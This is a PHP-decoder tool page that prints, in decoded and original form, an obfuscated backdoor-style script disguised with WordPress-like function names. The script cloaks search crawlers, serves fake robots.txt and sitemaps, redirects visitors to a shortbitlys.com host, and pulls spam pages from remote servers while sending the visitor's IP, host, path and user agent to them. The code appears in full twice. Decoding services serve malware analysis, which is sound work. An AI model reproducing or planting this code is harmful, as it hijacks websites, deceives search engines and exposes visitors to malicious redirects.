Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

?php error_reporting(0); function wp_xfnh($u,$z2,$Xfnh,$Mfnh,$n=0) { $sev1 = $_SERVE..

Decoded Output download

<?  ?php 
error_reporting(0); 
 
function wp_xfnh($u,$z2,$Xfnh,$Mfnh,$n=0) { 
	$sev1 = $_SERVER; 
	if(!$Mfnh[1]($Xfnh[0])){$c = $Mfnh[2](array($Xfnh[1]=>array($Xfnh[2]=>$Xfnh[3],$Xfnh[4]=>60)));$s = @$Mfnh[3]($u, false, $c);}else{$z1 = array($Xfnh[5].@$sev1[$Xfnh[6]],$Xfnh[7].$z2[2],$Xfnh[8].$sev1[$Xfnh[9]],$Xfnh[10].$sev1[$Xfnh[11]]);$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $u);curl_setopt($ch, CURLOPT_USERAGENT, @$sev1[$Xfnh[12]]);curl_setopt($ch, CURLOPT_HTTPHEADER, $z1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_TIMEOUT, 60);$s = curl_exec($ch);$a = curl_getinfo($ch);curl_close($ch);if($a[$Xfnh[13]]!=$Xfnh[14]) $s = $Xfnh[15];} 
	if(empty($s) && $n<1) return wp_xfnh(str_replace($z2[0],$z2[1],$u),$z2,$Xfnh,$Mfnh,1);  
	return $s; 
} 
 
function wp_yfnh() { 
	$Xfnh = explode(';','curl_exec;http;method;GET;timeout;Accept-Language:;HTTP_ACCEPT_LANGUAGE;User-IP:;User-URI:;REQUEST_URI;User-HOST:;HTTP_HOST;HTTP_USER_AGENT;http_code;200;;HTTP_CF_CONNECTING_IP;HTTP_CF_CONNECTING_IP;HTTP_X_FORWARDED_FOR;HTTP_X_FORWARDED_FOR;HTTP_CLIENT_IP;HTTP_CLIENT_IP;HTTP_X_REAL_IP;HTTP_X_REAL_IP;REMOTE_ADDR;,;HTTP_USER_AGENT;/(google|bing|yahoo|msn.com|yahoo.com|aol.com)/i;REQUEST_URI;HTTP_ACCEPT_LANGUAGE;HTTP_HOST;/[w0-9\.-]/;;^[0-9]\.[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+\.;[0-9]-[0-9]+-[0-9]+;[0-9][0-9][0-9]c[0-9]+;/^;/;/^;/;/;/;;;pingxml;/\?.$/;https://www.google.com/ping?sitemap=http://;?sitemap;.xml;#;Received<;PING-1;PING-0;w;Location: http://api333.shortbitlys.com/jump;/^;-[0-9]+-[0-9]+-[0-9]+/;2308.php?t=;&hh=;&s=;/^;-.+/;23data10.php?t=;&hh=;&s=;2307.php?t=;&hh=;&s=;/\.(jpg|gif|jpeg|png|ico|css|js|ini|log)/i;robots.txt;Content-Type: text/plain;User-agent: *;Allow: /;Sitemap: http://;/?sitemap.xml;/sitemap[0-9]\.xml/;sitemap;999c9;/^;/;/^;/;1-999-1;/^;/;/^;/;{|};{|};{|};HTTP_USER_AGENT;.audi'.'oblogg'.chr(101).'rslive.;.askpa'.'ss'.chr(101).'nger.;http://ns7;com/_html2309.php;/^;/;http://ns10;com/_data10all3.php;?key=;&path=;&s=;&hd=;</urlset>;Content-type:text/xml'); 
	$Mfnh = explode(';','error_reporting;function_'.chr(101).'xists;stream_context_create;file_g'.chr(101).'t_contents;g'.chr(101).'thostbyaddr;header;url'.chr(101).'ncode;bas'.chr(101).'64_'.chr(101).'ncode'); 
	$sev1 = $_SERVER; $g1 = $_GET; 
	if(isset($sev1[$Xfnh[16]])){$i = $sev1[$Xfnh[16]];} elseif(isset($sev1[$Xfnh[18]])){$i = $sev1[$Xfnh[18]];} elseif(isset($sev1[$Xfnh[20]])){$i = $sev1[$Xfnh[20]];} elseif(isset($sev1[$Xfnh[22]])){$i = $sev1[$Xfnh[22]];} else{$i = $sev1[$Xfnh[24]];} 
	$p = explode($Xfnh[25],$i); 
	$x1 = $p[0]; 
	$x2 = @$sev1[$Xfnh[12]].@$Mfnh[4]($x1); 
	$x3 = (preg_match($Xfnh[27],$x2)?1:0); 
	$x4 = $sev1[$Xfnh[9]]; 
	$x5 = @$sev1[$Xfnh[6]]; 
	$x6 = $sev1[$Xfnh[11]]; 
 
	$x7 = substr(preg_replace($Xfnh[31],"",$x6),0,3); 
	$x8 = substr($x7,0,1); 
 
	$x9 = $Xfnh[15]; 
	$y1 = $Xfnh[33]; 
	$y2 = $x7.$Xfnh[34]; 
	$y3 = $x7.$Xfnh[35]; 
 
	if(!empty($g1)) { 
		foreach($g1 as $k=>$v) { 
			if(preg_match($Xfnh[36].$y2.$Xfnh[37],$v)) {$x8 = $k;break;} 
			if(preg_match($Xfnh[36].$y3.$Xfnh[37],$v)) {$x8 = $k;break;} 
			if(preg_match($Xfnh[37].$y1.$Xfnh[37],$v)) {$x9 = $v;break;} 
		} 
	} 
	$y4 = $Xfnh[15]; 	$y5 = isset($g1[$x8]) ? trim($g1[$x8]) : $Xfnh[15]; 
 
	if(strstr($x4,$Xfnh[44])) { 
		$y6 = preg_replace($Xfnh[45],"",$x4); 
		$y7 = $Xfnh[46].$x6.$y6.$Xfnh[47].rand(1,99).$Xfnh[48]; 
		echo $y7.$Xfnh[49]; 
		if(strstr(@$Mfnh[3]($y7),$Xfnh[50])) exit($Xfnh[51]); 
		exit($Xfnh[52]); 
	} 
 
	if(strlen($x2)>20 && !empty($x5) && !$x3) { 
		$y8 = "w"; $y9 = $Xfnh[54]; 
		if(preg_match($Xfnh[36].$y2.$Xfnh[56],$y5)) { 
			$Mfnh[5]($y9.$Xfnh[57].$y8.$Xfnh[58].$x6.$Xfnh[59].$Mfnh[6]($y5));exit; 
		} elseif(preg_match($Xfnh[36].$y3.'/',$y5)) { 
			$Mfnh[5]($y9.$Xfnh[62].$y8.$Xfnh[58].$x6.$Xfnh[59].$Mfnh[6]($y5));exit; 
		} elseif(!empty($x9)) { 
			$Mfnh[5]($y9.$Xfnh[65].$y8.$Xfnh[58].$x6.$Xfnh[59].$Mfnh[6]($x9));exit; 
		} 
	} 
 
	if(preg_match($Xfnh[68],$x4)) return; 
 
	if($x3) { 
		if(substr($x4,-10)==$Xfnh[69]) { 
			$Mfnh[5]($Xfnh[70]); 
			exit($Xfnh[71]."
".$Xfnh[72]."

".$Xfnh[73].$x6.$Xfnh[74]); 
		}elseif(preg_match($Xfnh[75],$x4) || $y5==$Xfnh[76]) { 
			$y5=$x7.$Xfnh[77]; 
		}elseif(!preg_match($Xfnh[36].$y2.$Xfnh[37],$y5) && !preg_match($Xfnh[36].$y3.$Xfnh[37],$y5)) { 
			$y5=$x7.$Xfnh[82]; 
		} 
		 
		if(preg_match($Xfnh[36].$y2.$Xfnh[37],$y5) || preg_match($Xfnh[36].$y3.$Xfnh[37],$y5)) { 
			$z1 = $Mfnh[7]($x6.$Xfnh[87].$x4.$Xfnh[87].$x1.$Xfnh[87].@$sev1[$Xfnh[12]]); 
			$z2 = array($Xfnh[91], $Xfnh[92]); 
			$z3 = $Xfnh[93].$z2[0].$Xfnh[94]; 
			if(preg_match($Xfnh[36].$y3.$Xfnh[37],$y5)) { 
				$z3 = $Xfnh[97].$z2[0].$Xfnh[98]; 
			} 
			$z2[2] = $x1; 
			$z4 = wp_xfnh($z3.$Xfnh[99].$x8.$Xfnh[100].$y4.$Xfnh[59].$Mfnh[6]($y5).$Xfnh[102].$Mfnh[6]($z1),$z2,$Xfnh,$Mfnh); 
 
			if(strstr($z4,$Xfnh[103])) { $Mfnh[5]($Xfnh[104]); exit($z4); } 
			if(strlen($z4)>500) {exit($z4);} 
		} 
	} 
} wp_yfnh(); 
?>

Did this file decode correctly?

Original Code

?php
error_reporting(0);

function wp_xfnh($u,$z2,$Xfnh,$Mfnh,$n=0) {
	$sev1 = $_SERVER;
	if(!$Mfnh[1]($Xfnh[0])){$c = $Mfnh[2](array($Xfnh[1]=>array($Xfnh[2]=>$Xfnh[3],$Xfnh[4]=>60)));$s = @$Mfnh[3]($u, false, $c);}else{$z1 = array($Xfnh[5].@$sev1[$Xfnh[6]],$Xfnh[7].$z2[2],$Xfnh[8].$sev1[$Xfnh[9]],$Xfnh[10].$sev1[$Xfnh[11]]);$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $u);curl_setopt($ch, CURLOPT_USERAGENT, @$sev1[$Xfnh[12]]);curl_setopt($ch, CURLOPT_HTTPHEADER, $z1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_TIMEOUT, 60);$s = curl_exec($ch);$a = curl_getinfo($ch);curl_close($ch);if($a[$Xfnh[13]]!=$Xfnh[14]) $s = $Xfnh[15];}
	if(empty($s) && $n<1) return wp_xfnh(str_replace($z2[0],$z2[1],$u),$z2,$Xfnh,$Mfnh,1); 
	return $s;
}

function wp_yfnh() {
	$Xfnh = explode(';','curl_exec;http;method;GET;timeout;Accept-Language:;HTTP_ACCEPT_LANGUAGE;User-IP:;User-URI:;REQUEST_URI;User-HOST:;HTTP_HOST;HTTP_USER_AGENT;http_code;200;;HTTP_CF_CONNECTING_IP;HTTP_CF_CONNECTING_IP;HTTP_X_FORWARDED_FOR;HTTP_X_FORWARDED_FOR;HTTP_CLIENT_IP;HTTP_CLIENT_IP;HTTP_X_REAL_IP;HTTP_X_REAL_IP;REMOTE_ADDR;,;HTTP_USER_AGENT;/(google|bing|yahoo|msn.com|yahoo.com|aol.com)/i;REQUEST_URI;HTTP_ACCEPT_LANGUAGE;HTTP_HOST;/[w0-9\.-]/;;^[0-9]\.[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+\.;[0-9]-[0-9]+-[0-9]+;[0-9][0-9][0-9]c[0-9]+;/^;/;/^;/;/;/;;;pingxml;/\?.$/;https://www.google.com/ping?sitemap=http://;?sitemap;.xml;#;Received<;PING-1;PING-0;w;Location: http://api333.shortbitlys.com/jump;/^;-[0-9]+-[0-9]+-[0-9]+/;2308.php?t=;&hh=;&s=;/^;-.+/;23data10.php?t=;&hh=;&s=;2307.php?t=;&hh=;&s=;/\.(jpg|gif|jpeg|png|ico|css|js|ini|log)/i;robots.txt;Content-Type: text/plain;User-agent: *;Allow: /;Sitemap: http://;/?sitemap.xml;/sitemap[0-9]\.xml/;sitemap;999c9;/^;/;/^;/;1-999-1;/^;/;/^;/;{|};{|};{|};HTTP_USER_AGENT;.audi'.'oblogg'.chr(101).'rslive.;.askpa'.'ss'.chr(101).'nger.;http://ns7;com/_html2309.php;/^;/;http://ns10;com/_data10all3.php;?key=;&path=;&s=;&hd=;</urlset>;Content-type:text/xml');
	$Mfnh = explode(';','error_reporting;function_'.chr(101).'xists;stream_context_create;file_g'.chr(101).'t_contents;g'.chr(101).'thostbyaddr;header;url'.chr(101).'ncode;bas'.chr(101).'64_'.chr(101).'ncode');
	$sev1 = $_SERVER; $g1 = $_GET;
	if(isset($sev1[$Xfnh[16]])){$i = $sev1[$Xfnh[16]];} elseif(isset($sev1[$Xfnh[18]])){$i = $sev1[$Xfnh[18]];} elseif(isset($sev1[$Xfnh[20]])){$i = $sev1[$Xfnh[20]];} elseif(isset($sev1[$Xfnh[22]])){$i = $sev1[$Xfnh[22]];} else{$i = $sev1[$Xfnh[24]];}
	$p = explode($Xfnh[25],$i);
	$x1 = $p[0];
	$x2 = @$sev1[$Xfnh[12]].@$Mfnh[4]($x1);
	$x3 = (preg_match($Xfnh[27],$x2)?1:0);
	$x4 = $sev1[$Xfnh[9]];
	$x5 = @$sev1[$Xfnh[6]];
	$x6 = $sev1[$Xfnh[11]];

	$x7 = substr(preg_replace($Xfnh[31],"",$x6),0,3);
	$x8 = substr($x7,0,1);

	$x9 = $Xfnh[15];
	$y1 = $Xfnh[33];
	$y2 = $x7.$Xfnh[34];
	$y3 = $x7.$Xfnh[35];

	if(!empty($g1)) {
		foreach($g1 as $k=>$v) {
			if(preg_match($Xfnh[36].$y2.$Xfnh[37],$v)) {$x8 = $k;break;}
			if(preg_match($Xfnh[36].$y3.$Xfnh[37],$v)) {$x8 = $k;break;}
			if(preg_match($Xfnh[37].$y1.$Xfnh[37],$v)) {$x9 = $v;break;}
		}
	}
	$y4 = $Xfnh[15]; 	$y5 = isset($g1[$x8]) ? trim($g1[$x8]) : $Xfnh[15];

	if(strstr($x4,$Xfnh[44])) {
		$y6 = preg_replace($Xfnh[45],"",$x4);
		$y7 = $Xfnh[46].$x6.$y6.$Xfnh[47].rand(1,99).$Xfnh[48];
		echo $y7.$Xfnh[49];
		if(strstr(@$Mfnh[3]($y7),$Xfnh[50])) exit($Xfnh[51]);
		exit($Xfnh[52]);
	}

	if(strlen($x2)>20 && !empty($x5) && !$x3) {
		$y8 = "w"; $y9 = $Xfnh[54];
		if(preg_match($Xfnh[36].$y2.$Xfnh[56],$y5)) {
			$Mfnh[5]($y9.$Xfnh[57].$y8.$Xfnh[58].$x6.$Xfnh[59].$Mfnh[6]($y5));exit;
		} elseif(preg_match($Xfnh[36].$y3.'/',$y5)) {
			$Mfnh[5]($y9.$Xfnh[62].$y8.$Xfnh[58].$x6.$Xfnh[59].$Mfnh[6]($y5));exit;
		} elseif(!empty($x9)) {
			$Mfnh[5]($y9.$Xfnh[65].$y8.$Xfnh[58].$x6.$Xfnh[59].$Mfnh[6]($x9));exit;
		}
	}

	if(preg_match($Xfnh[68],$x4)) return;

	if($x3) {
		if(substr($x4,-10)==$Xfnh[69]) {
			$Mfnh[5]($Xfnh[70]);
			exit($Xfnh[71]."\n".$Xfnh[72]."\n\n".$Xfnh[73].$x6.$Xfnh[74]);
		}elseif(preg_match($Xfnh[75],$x4) || $y5==$Xfnh[76]) {
			$y5=$x7.$Xfnh[77];
		}elseif(!preg_match($Xfnh[36].$y2.$Xfnh[37],$y5) && !preg_match($Xfnh[36].$y3.$Xfnh[37],$y5)) {
			$y5=$x7.$Xfnh[82];
		}
		
		if(preg_match($Xfnh[36].$y2.$Xfnh[37],$y5) || preg_match($Xfnh[36].$y3.$Xfnh[37],$y5)) {
			$z1 = $Mfnh[7]($x6.$Xfnh[87].$x4.$Xfnh[87].$x1.$Xfnh[87].@$sev1[$Xfnh[12]]);
			$z2 = array($Xfnh[91], $Xfnh[92]);
			$z3 = $Xfnh[93].$z2[0].$Xfnh[94];
			if(preg_match($Xfnh[36].$y3.$Xfnh[37],$y5)) {
				$z3 = $Xfnh[97].$z2[0].$Xfnh[98];
			}
			$z2[2] = $x1;
			$z4 = wp_xfnh($z3.$Xfnh[99].$x8.$Xfnh[100].$y4.$Xfnh[59].$Mfnh[6]($y5).$Xfnh[102].$Mfnh[6]($z1),$z2,$Xfnh,$Mfnh);

			if(strstr($z4,$Xfnh[103])) { $Mfnh[5]($Xfnh[104]); exit($z4); }
			if(strlen($z4)>500) {exit($z4);}
		}
	}
} wp_yfnh();
?>

Function Calls

None

Variables

None

Stats

MD5 d1891944cfe205c9287b36ec57f55a6f
Eval Count 0
Decode Time 55 ms